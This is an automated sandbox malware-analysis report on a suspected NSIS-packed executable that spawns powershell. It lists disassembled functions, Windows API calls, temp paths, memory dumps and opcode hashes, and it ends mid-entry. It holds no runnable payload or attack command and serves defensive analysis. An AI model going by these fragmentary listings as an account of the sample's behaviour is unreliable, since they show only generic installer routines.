                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp
                                                                                            • API String ID: 3213498283-4063874830
                                                                                            • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                            • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                            • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                            • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                            Function 00405B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-3936084776
                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                            • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                            • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                                            Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                            • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                            • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                            • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                            • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                            Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405CCD
                                                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 00405CDD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp
                                                                                            • API String ID: 3248276644-4063874830
                                                                                            • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                            • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                            • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                                            • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                            Function 00405273 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 004052A2
                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                                              • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                            • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                                            • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                            • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                                            Function 004038F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403913
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-3936084776
                                                                                            • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                            • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                                            • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                            • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                                            Function 00405BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\You7ynHizy.exe,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\You7ynHizy.exe,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-3125694417
                                                                                            • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                            • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                                            • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                            • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                                            Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                            • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                            • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                            • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                                            Executed Functions

                                                                                            Function 0719CC66 Relevance: 1.8, Instructions: 1844COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0db0c99a38096878b8fc8246231f8bbea73dbc3f8de53da761d7638d65c46955
                                                                                            • Instruction ID: 1222bfc1d142470a624f0958f5847a45210c3a5fa8a8c667b778b710a8b958b6
                                                                                            • Opcode Fuzzy Hash: 0db0c99a38096878b8fc8246231f8bbea73dbc3f8de53da761d7638d65c46955
                                                                                            • Instruction Fuzzy Hash: FF0351B0A00219DFDB24DB64C854BDAB7B2BF85344F10C4A9D909AB785DB71ED82CF91
                                                                                            Function 0476DFE0 Relevance: .7, Instructions: 716COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 973ff119df35df0dfd9dd55d2f0ee758dda4c285b75b80919571ff797057eec6
                                                                                            • Instruction ID: 136c40f7e2dde6a4a28b8af2ffbc26bdac43fc3137026a411a0eec3361591aa1
                                                                                            • Opcode Fuzzy Hash: 973ff119df35df0dfd9dd55d2f0ee758dda4c285b75b80919571ff797057eec6
                                                                                            • Instruction Fuzzy Hash: 38528E38B00215CFDB25DF65D8547ADBBB3BF84304F1080A9E80AA7355EB74A985CFA1
                                                                                            Function 0097F300 Relevance: .1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511008080.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_97d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7d6b079ed2eedf405b17a860f96f890bae7eb897520560d36f8692e22ab07bc
                                                                                            • Instruction ID: fd0b5a08bdd3bc2bbb45b308bb1bae5205f45525988c201bd97a7b53902b0c3b
                                                                                            • Opcode Fuzzy Hash: d7d6b079ed2eedf405b17a860f96f890bae7eb897520560d36f8692e22ab07bc
                                                                                            • Instruction Fuzzy Hash: F621E0B6504200EFCF05DF20D9D0B26BB65FB88354F24C5ADE90D5A256C73AD856CB61
                                                                                            Function 08F91F3A Relevance: 1.3, Instructions: 1298COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb738d3425c2b6c8f307d96eaadbcfeef7c2ac344af28a980fe55f427b1625f0
                                                                                            • Instruction ID: b2f64a3b551684b26c272bf972584f8e9c1c714f172192fc255a21939e732ef3
                                                                                            • Opcode Fuzzy Hash: bb738d3425c2b6c8f307d96eaadbcfeef7c2ac344af28a980fe55f427b1625f0
                                                                                            • Instruction Fuzzy Hash: CEC10E75A00209EFEF05CFA8D484A9DBBB2FF88310F148159E954AB365C775DD92CB90
                                                                                            Function 0719DA46 Relevance: 1.2, Instructions: 1234COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0ae4ee110b1ccf38da7b624ff77fbe8b137901a8bb99edf7036de533ca3cfca
                                                                                            • Instruction ID: 8e195fb38b3e202dec96ee1d21c3d7688d34f5af4385a81ca2f6672fa850dd59
                                                                                            • Opcode Fuzzy Hash: c0ae4ee110b1ccf38da7b624ff77fbe8b137901a8bb99edf7036de533ca3cfca
